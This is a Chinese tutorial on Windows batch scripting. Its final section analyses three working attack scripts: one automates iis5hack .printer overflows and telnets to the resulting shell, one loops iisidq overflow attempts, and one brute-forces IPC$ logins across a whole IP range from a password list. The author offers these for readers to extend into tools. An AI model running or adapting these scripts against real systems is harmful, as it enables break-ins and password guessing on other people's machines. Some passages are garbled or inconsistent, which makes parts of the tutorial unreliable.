如何寫批處理檔案

1、 REM

REM 是個注釋指令一般是用來給程式加上注解的，該指令後的内容在程式執行的時候将不會被顯示和執行。例：

REM 你現在看到的就是注解，這一句将不會被執行。在以後的例子中解釋的内容都REM 會放在REM後面。請大家注意。

2、 ECHO

ECHO 是一個回顯指令主要參數有OFF和 ON,一般用ECHO message來顯示一個特定的消息 。例：

Echo off

Rem 以上代表關閉回顯即不顯示所執行的指令

Echo 這個就是消息。

Rem 以上代表顯示“這就是消息”這列字元

執行結果：

C:\>ECHO.BAT

這個就是消息。

3、 GOTO

GOTO 即為跳轉的意思。在批進行中允許以“：XXX”來建構一個标号然後用GOTO ：标号直接來執行标号後的指令。例

:LABEL

REM 上面就是名為LABEL的标号。

DIR C:\

DIR D:\

GOTO LABEL

REM 以上程式跳轉标号LABEL處繼續執行。

4、CALL

CALL 指令可以在批處理執行過程中調用另一個批處理，當另一個批處理執行完後再繼續執行原來的批處理。例：

批處理2.BAT内容如下：

ECHO 這就是2的内容

批處理1.BAT内容如下：

ECHO 這是1的内容

CALL 2.BAT

ECHO 1和2的内容全部顯示完成

執行結果如下：

C:\>1.BAT

這是1的内容

這就是2的内容

1和2的内容全部顯示完成

5、PAUSE

PAUSE 停止系統指令的執行并顯示下面的内容。例：

C:\> PAUSE

請按任意鍵繼續 . . .

6、 IF

IF 條件判斷語句，文法格式如下：

IF [NOT] ERRORLEVEL number command

IF [NOT] string1==string2 command

IF [NOT] EXIST filename command

說明：

[NOT] 将傳回的結果取反值即“如果沒有”的意思。

ERRORLEVEL 是指令執行完成後傳回的退出值

Number 退出值的數字取值範圍0~255。判斷時值的排列順序應該又大到小。傳回的值大于或等于指定的值時條件成立。

string1==string2 string1和string2都為字元的資料，英文字元的大小寫将看做不同，這個條件中的等于号必須是2個（絕對相等），條件想等後即執行後面的 command

EXIST filename 為檔案或目錄存在的意思。

IF ERRORLEVEL這條語句必須放在某一個指令後面。執行指令後由IF ERRORLEVEL來判斷指令的傳回值。

例：

1、 IF [NOT] ERRORLEVEL number command

檢測指令執行完後的傳回值做出判斷。

echo off

dir z:

rem 如果退出代碼為1（不成功）就跳至标題1處執行

IF ERRORLEVEL 1 goto 1

rem 如果退出代碼為0（成功）就跳至标題0處執行

IF ERRORLEVEL 0 goto 0

:0

echo 指令執行成功！

Rem 程式執行完畢跳至标題exit處退出

goto exit

:1

echo 指令執行失敗！

:exit

Rem 這裡是程式的出口

2、 IF string1==string2 command

檢測目前變量的值做出判斷

ECHO OFF

IF %1==2 goto no

Echo 變量相等！

Goto exit

:no

echo 變量不相等

大家可以這樣看效果 C:\>test.bat 數字

3、 IF [NOT] EXIST filename command

發現特定的檔案做出判斷

IF not EXIST autoexec.bat goto 1

echo 檔案存在成功！

echo 檔案不存在失敗！

這個批處理大家可以放在c盤和d盤分别執行看看效果。

7、 FOR

FOR這個指令比較特殊是一個循環執行指令的指令，同時FOR的循環裡面還可以套用FOR在進行循環。這篇我們介紹基本的用法就不做套用的循環了，後面再來講解套用的循環。在批進行中FOR的指令如下：

FOR [%%c] IN (set) DO [command] [arguments]

在指令行中指令如下：

FOR [%c] IN (set) DO [command] [arguments]

常用參數：

/L 該集表示以增量形式從開始到結束的一個數字序列。是以，(1,1,5) 将産生序列 1 2 3 4 5，(5,-1,1) 将産生序列 (5 4 3 2 1)。

/D 如果集中包含通配符，則指定與目錄名比對，而不與檔案名比對。

/F 從指定的檔案中讀取資料作為變量

eol=c - 指一個行注釋字元的結尾(就一個)

skip=n - 指在檔案開始時忽略的行數。

delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的預設分隔符集。

tokens=x,y,m-n - 指每行的哪一個符号被傳遞到每個疊代的 for 本身。這會導緻額外變量名稱的配置設定。m-n格式為一個範圍。通過 nth 符号指定 mth。如果符号字元串中的最後一個字元星号，那麼額外的變量将在最後一個符号解析之後配置設定并接受行的保留文本。

usebackq - 指定新文法已在下類情況中使用:在作為指令執行一個後引号的字元串并且一個單引号字元為文字字元串指令并允許在 filenameset中使用雙引号擴起檔案名稱。

下面來看一個例子：

FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k

會分析 myfile.txt 中的每一行，忽略以分号打頭的那些行，将每行中的第二個和第三個符号傳遞給 for 程式體；用逗号和/或空格定界符号。請注意，這個 for 程式體的語句引用 %i 來取得第二個符号，引用 %j 來取得第三個符号，引用 %k來取得第三個符号後的所有剩餘符号。對于帶有空格的檔案名，您需要用雙引号将檔案名括起來。為了用這種方式來使用雙引号，您還需要使用 usebackq 選項，否則，雙引号會被了解成是用作定義某個要分析的字元串的。

%i 專門在 for 語句中得到說明，%j 和 %k 是通過tokens= 選項專門得到說明的。您可以通過 tokens= 一行指定最多 26 個符号，隻要不試圖說明一個高于字母 'z' 或'Z' 的變量。請記住，FOR 變量名分大小寫，是通用的；而且，同時不能有 52 個以上都在使用中。

您還可以在相鄰字元串上使用 FOR /F 分析邏輯；方法是，用單引号将括号之間的 filenameset 括起來。這樣，該字元串會被當作一個檔案中的一個單一輸入行。最後，您可以用 FOR /F 指令來分析指令的輸出。方法是，将括号之間的 filenameset 變成一個反括字元串。該字元串會被當作指令行，傳遞到一個子 CMD.EXE，其輸出會被抓進記憶體，并被當作檔案分析。是以，以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

會枚舉目前環境中的環境變量名稱。

以下列舉一個簡單的例子，他将說明參數/L和沒有參數的差別：

删除檔案1.TXT 2.TXT 3.TXT 4.TXT 5.TXT

FOR /L %%F IN (1,1,5) DO DEL %%F.TXT

或

FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT

以上2條指令執行的結果都是一樣的如下：

C:\>DEL 1.TXT

C:\>DEL 2.TXT

C:\>DEL 3.TXT

C:\>DEL 4.TXT

C:\>DEL 5.TXT

8、 SETLOCAL

開始批處理檔案中環境改動的本地化操作。在執行 SETLOCAL 之後

所做的環境改動隻限于批處理檔案。要還原原先的設定，必須執

行 ENDLOCAL。 達到批處理檔案結尾時，對于該批處理檔案的每個

尚未執行的 SETLOCAL 指令，都會有一個隐含的 ENDLOCAL 被

執行。例：

@ECHO OFF

SET PATH /*察看環境變量PATH

PAUSE

SETLOCAL

SET PATH=E:\TOOLS /*重新設定環境變量PATH

SET PATH

ENDLOCAL

從上例我們可以看到環境變量PATH第1次被顯示得時候是系統預設路徑。被設定成了E:\TOOLS後顯示為E:\TOOLS但當ENDLOCAL後我們可以看到他又被還原成了系統的預設路徑。但這個設定隻在該批處理運作的時候有作用。當批處理運作完成後環境變量PATH将會還原。

9、 SHIFT

SHIFT指令可以讓在指令上的的指令使用超過10個（%0~%9）以上的可替代參數例：

ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

SHIFT

C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11

1 2 3 4 5 6 7 8 9

2 3 4 5 6 7 8 9 10

3 4 5 6 7 8 9 10 11

以上就是基于WIN2000下的9個批處理指令。

第二部分：特殊的符号與批處理

在指令行下有些符号是不允許使用的但有些符号卻有着特殊的意義。

1、 符号(@)

@在批進行中的意思是關閉目前行的回顯。我們從上面知道用指令echo off可以關掉整個批處理的指令回顯但卻不能不顯示echo off這個指令。現在我們在這個指令前加上@這樣echo off這一指令就被@關閉了回顯進而達到所有指令均不回顯得要求

2、 符号(>)

>的意思是傳遞并覆寫。他所起的作用是将運作後的回顯結果傳遞到後面的範圍（後面可是檔案也可是預設的系統控制台）例：

檔案1.txt的檔案内容為：

1+1

使用指令c:\>dir *.txt >1.txt

這時候1.txt的内容如下

驅動器 C 中的卷沒有标簽。

卷的序列号是 301A-1508

C:\ 的目錄

2003-03-11 14:04 1,005 FRUNLOG.TXT

2003-04-04 16:38 18,598,494 log.txt

2003-04-04 17:02 5 1.txt

2003-03-12 11:43 0 aierrorlog.txt

2003-03-30 00:35 30,571 202.108.txt

5 個檔案 18,630,070 位元組

0 個目錄 1,191,542,784 可用位元組

>将指令執行的結哺橇嗽嫉奈募内容?

在傳遞給控制台的時候程式将不會有任何回顯（注意：這裡的回顯跟echo off關掉的回顯不是同一概念。Echo off關掉的是輸入指令的回顯，這裡的回顯是程式執行中或後的回顯）例：

C:\>dir *.txt >nul

程式将沒有任何顯示也不會産生任何痕迹。

3、 符号(>>)

符号>>的作用與符号>相似，但他們的差別在于>>是傳遞并在檔案末尾追加>>也可将回顯傳遞給控制台（用法同上）例：

檔案1.txt内同為：

使用指令c:\>dir *.txt >>1.txt

>>将指令執行的結果覆加在了原始的檔案内容後面。

4、 符号(|)

|是一個管道傳輸指令意思是将上一指令執行的結果傳遞給下一指令去處理。例：

C:\>dir c:\|find "1508"

以上指令的意思為查找c:\的所有并發現1508字元串。Find的用法請用 find /?自行檢視

在不使用format的自動格式化參數的時候我是這樣來自動格式化盤片的

echo y|fornat a: /s /q /v:system

用過format指令的人都知道format有一個互動對化過程，要使用者輸入y來确定目前的指令是否被執行。在這個指令前加上echo y并用管道傳輸符|将echo執行的結果y傳遞給format進而達到手工輸入y的目的（這條指令有危害性，測試的時候請謹慎）

5、 符号(^)

^ 是對特殊符号 > 、<、 &、的前導字元。在指令中他将以上的3個符号的特殊動能去掉僅僅隻吧他們當成符号而不使用他們的特殊意義。例：

c:\>echo test ^> 1.txt

test > 1.txt

從上面可以看出并沒有把test寫入檔案1.txt而是将test >1.txt 當字元串顯示了出來。這個符号在遠端建構批處理的時候很有效果。

6、 符号(&)

&符号允許在一行中使用2個以上不同的指令，當第一個指令執行失敗将不影響第2個指令的執行。例：

c:\> dir z:\ &dir y:\ &dir c:\

以上的指令将會連續顯示z: y: c:盤内的内容不理會該盤符是否存在。

7、 符号(&&)

&&符号也是允許在一行中使用2個以上不同的指令，當第一個指令執行失敗後後續的指令将不會再被執行。例：

c:\> dir z:\ &&dir y:\ &&dir c:\

以上的指令将會提示檢查是否存在z:盤如果存在則執行，如果不存在則停止執行所有的後續指令

8、 符号(" ")

" "符号允許在字元串中包含空格。進入一個特殊的目錄可以用如下方法例:

c:\>cd “Program Files”

c:\>cd progra~1

c:\>cd pro*

以上方法都可以進入Program Files目錄

9、 符号（,）

,符号相當于空格。在某些特殊的情況下可以用,來代替空格使用。例：

c:\>dir,c:\

10、 符号(;)

;符号當指令相同的時候可以将不同的目标用;隔離開來但執行效果不變。如執行過程中發生錯誤則隻傳回錯誤報告但程式還是會繼續執行。例：

DIR C:\;D:\;E:\F:\

以上的指令相當于

DIR E:\

DIR F:\

當然還有些特殊的符号但他們的使用範圍很小我就不再這裡一一的說明了。

第三部分：批處理與變量

在批進行中适當的引用變量将會使你所編制的程式應用面更廣。批處理每次能處理的變量從%0~%9共10個。其中%0預設給批處理的檔案名使用。除非在使用SHIFT指令後%0才能被%1所替代。引用shift指令的例子如果把%1前面多加上一個%0那麼結果如下：

SHIFT.BAT 1 2 3 4 5 6 7 8 9

1 2 3 4 5 6 7 8 9 10

2 3 4 5 6 7 8 9 10 11

系統是如何區分每個變量的呢，系統區分變量的規則為字元串中間的空格，即隻要發現空格就把空格前面的字元當作一個變量而空格後面的字元則作為另一個變量。如果你的變量是一個當中包含空格的長目錄名這時候你需要用上一節特殊符号8中所用的引号将他圈起來。例：

批處理内容為：

ECHO %1

ECHO %2

ECHO %3

輸入指令：

C:\>TEST “Program Files” Program Files

Program Files

Program

Files

在一個複雜的批進行中又可能同時使用的變量會超過10個這時候會和系統的規則想沖突那麼這個問題怎麼解決呢？在系統中還有一種變量稱之為環境變量（使用SET指令可以檢視目前系統的環境變量）如目前系統目錄是%windir%或%SystemRoot%等。當同時使用的參數超過10個的時候，我們可以把某些在後面的程式中還要調用的變量儲存為環境變量。具體用法如 SET A=%1 這樣我們就命名了一個新的環境變量A 在調用變量A的時候要%A%這樣調用，環境變量不受SHIFT指令影響。如果要改變一個環境變量需要重新對其設定才能改變。當然也可以進行變量與變量之間的傳遞來達到目的。下面我們來看一個例子，批處理如下：

SET PASS=%1

SET PASS1=%1

ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9

ECHO %PASS% %PASS1% %9

SET PASS=%PASS1% 變量的傳遞

SET PASS1=%9

使用指令：C:\>TEST A B 3 4 5 6 7 8 9 10 K L

A B 3 4 5 6 7 8 9 10 K 注意：這一行顯示了11個變量

A B L 在使用了3次SHIFT之後%9變成了L

B L 變量的傳遞後的結果

第四部分：完整案例

以上就是批處理的一些用法。現在我們把這些用法結合起來詳細的分析一下目前網上釋出的一些批處理，看看他們是怎麼運作的。這裡我将列舉三個例子來詳細分析，為了保持程式的完整我的注釋會加在/*後面。

例一

這個例子是利用iis5hack.exe對有.printer漏洞的主機進行溢出的批處理。用到的程式有iis5hack.exe和系統自帶的telnet.exe。iis5hack的指令格式為：

iis5hack <目标ip> <目标端口> <目标版本> <溢出連接配接端口>目标版本為0-9這10個數字分别對應不同語言版本和sp的系統版本，我們編制的批處理使用的指令格式為 <iis.bat 目标ip （開始版本号）>開始版本号可有可無。程式如下。

@echo off /*關閉指令回顯

if "%1%"=="" goto help /*判斷%1是否為空，%1為目标ip

if "%2%"=="1" goto 1 /*判斷%2是否為1，為1則跳轉标志1

if "%2%"=="2" goto 2 /*%2為開始版本号，如果沒有設定則

if "%2%"=="3" goto 3 /*如果存在則從比對的地方開始執行

if "%2%"=="4" goto 4

if "%2%"=="5" goto 5

if "%2%"=="6" goto 6

if "%2%"=="7" goto 7

if "%2%"=="8" goto 8

if not EXIST iis5hack.exe goto file /*沒有發現iis5hack.exe就執行标志file段内容

ping %1 -n 1 | find "Received = 1" /*ping目标1次，從結果中發現Received = 1

if errorlevel 1 goto error /*如果傳回代碼為1則執行error段(代碼1為沒有發現 0為發現并成功執行)

iis5hack %1 80 9 88 | find "good" /*開始溢出目标端口80 系統代碼9 溢出後連接配接端口88 在執行結果中發現字元串”good”(溢出成功後才會有字元串good)

if not errorlevel 1 goto telnet /*如果沒有錯誤代碼1（溢出成功）就執行telnet段的内容。

echo 作業系統類型 9 失敗! /否則顯示這一句

:8 /*以下代碼内容參照上面

iis5hack %1 80 8 88 | find "good"

if not errorlevel 1 goto telnet

echo 作業系統類型 8 失敗!

:7

iis5hack %1 80 7 88 | find "good"

echo 作業系統類型 7 失敗!

:6

iis5hack %1 80 6 88 | find "good"

echo 作業系統類型 6 失敗!

:5

iis5hack %1 80 5 88 | find "good"

echo 作業系統類型 5 失敗!

:4

iis5hack %1 80 4 88 | find "good"

echo 作業系統類型 4 失敗!

:3

iis5hack %1 80 3 88 | find "good"

echo 作業系統類型 3 失敗!

:2

iis5hack %1 80 2 88 | find "good"

echo 作業系統類型 2 失敗!

iis5hack %1 80 1 88 | find "good"

echo 作業系統類型 1 失敗!

iis5hack %1 80 0 88 | find "good"

echo 作業系統類型 0 失敗!

goto error

:telnet

telnet %1 88 /*開始連接配接目标ip的88端口

goto exit /*連接配接中斷後跳轉exit段

:error /*error段顯示錯誤後的幫助資訊

echo 可能網絡不能連接配接或者對方以修補該漏洞!請按照下面的格式手工嘗試一次!

echo iis5hack [目标IP] [WEB端口] [系統類型] [開放端口]

ECHO 中文: 0

ECHO 中文+sp1: 1

ECHO 英文: 2

ECHO 英文+sp1: 3

ECHO 日語: 4

ECHO 日語+sp1: 5

ECHO 韓文: 6

ECHO 韓文+sp1: 7

ECHO 墨西哥語: 8

ECHO 墨西哥語+sp1: 9

goto exit /*跳轉exit段

:file /*file段顯示檔案沒有發現的資訊

echo 檔案iis5hack.exe沒有發現!程式終止運作!

:help /*help段顯示本批處理的使用格式幫助

echo 本程式用法如下:

echo iis [目标ip]

echo iis [目标ip] [開始的号碼9-0]

:exit /*exit段為程式出口

這個批處理基本沒有什麼循環隻是一路走下來。是以代碼比較長難度不大！

例二

這個例子是用iisidq.exe對有idq漏洞的機器進行溢出的批處理。使用的程式有iisidq.exe和系統自帶的程式telnet.exe。iisidq.exe的用法如下：

運作參數: 作業系統類型 目的位址 web端口 1 溢出監聽端口 <輸入指令1>

其中,如果輸入指令參數沒有輸入,那麼,預設為:"cmd.exe"。

其中作業系統類型類型的代碼範圍是0-14。我們編制的批處理使用的指令格式為 <idq.bat 目标ip>程式如下：

@echo off /*同例一

if not EXIST iisidq.exe goto file /*同例一

if %1 == "" goto error /*同例一

ping %1 -n 1 | find "Received = 1" /*同例一

if errorlevel 1 goto error1 /*同例一

set b=%1 /*建立一個環境變量b,将變量%1的内容傳遞給環境變量b。變量b的内容以後将是目标ip

set a=0 /*建立一個環境變量a并指定環境變量a為0。由于使用整個批處理的循環是以用a來做計數器。

:no /*no段開始

if %a%==0 set d=0 /*如果環境變量a=0則建立環境變量d設定環境變量d=0。

if %a%==1 set d=1 /*環境變量d其實是作業系統類型代碼，用計數器來控制其

if %a%==2 set d=2 /*變動。

if %a%==3 set d=3

if %a%==4 set d=4

if %a%==5 set d=5

if %a%==6 set d=6

if %a%==7 set d=7

if %a%==9 set d=9

if %a%==10 set d=13

if %a%==11 set d=14

goto 0 /*變量傳遞完成後轉到标志0處運作

echo 正在執行第%d%項!與目标%b%不能連接配接!正在嘗試連接配接請等候......

:0 /*标志0開始

IISIDQ %d% %b% 80 1 99 |find "good" /*按格式發送溢出指令并在結果中發現字元串good（發送代碼成功才會有字元串good）

if errorlevel 1 goto 1 /*如果沒有good字元串則沒有發送成跳

/*轉标志1處繼續嘗試發送

ping 127.0.0.1 -n 8 >nul /*ping自己8次相當于延時8秒不顯示執

/*行結果

echo 正在執行第%d%項! /*報告正在溢出的作業系統類型

telnet %b% 99 /*連接配接溢出端口

echo. /*顯示一個空行

if %d%==14 goto error1 /*如果作業系統類型為14則跳轉error1處（循環出口）

if %d%==13 set a=11 /*開始用計數器對作業系統代碼重新附值

if %d%==9 set a=10

if %d%==7 set a=9

if %d%==6 set a=7

if %d%==5 set a=6

if %d%==4 set a=5

if %d%==3 set a=4

if %d%==2 set a=3

if %d%==1 set a=2

if %d%==0 set a=1

goto no /*附值完成跳轉no段執行

:file /*以下都是出錯後的幫助提示

echo IIsidq.exe沒有發現!将該檔案和本檔案放在同一目錄!

:error

echo 錯誤!目标ip不可識别!請使用下面的格式連接配接!

echo idq [目标IP]

:error1

echo 連接配接沒有成功!可能目标機器已經修補了該漏洞或者網絡故障所至!

echo 請按照下面的格式手工嘗試!

echo iisidq [目标類型] [目标IP] [目标端口] [連接配接方式] [溢出端口]

echo telnet [目标ip] [溢出端口]

:exit /*整個程式的出口

這個批處理采用的整體循環掌握好計數器部分就掌握了這個批處理。

例三

for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use \\%1.%%a.%%b.%%c\ipc$ %%e /u:%%f

上面的指令為1條指令。大家可以看出該指令使用了4個FOR來套用的。用法為：C:\>TEST.BAT 218 當輸入218回車後該指令會由第1個for取初始值0為%%a然後繼續取第2個for的初始值0為%%b繼續取第3個for的初始值1為%%c最後一個for是将userpass.txt中的第一段字元作為密碼%%e第二段字元作為使用者名%%f最後執行指令 (這裡我把上面的值都帶進去，設密碼為123 使用者名為 abc)

net usr \\218.0.0.1\ipc$ 123 /u:abc

當然上面這個例子可能有些朋友會說太簡單并且太死闆不靈活。我把這個例子做了些修改（完整檔案見CD光牒ipc.bat）由興趣的朋友可以自己看看。修改後的程式可以靈活的查找你指定開始到結束或你指定開始到最大ip的範圍。當然功能還可以在加強，至于能加強到什麼地步能不能成為一個新的工具那就是你的事了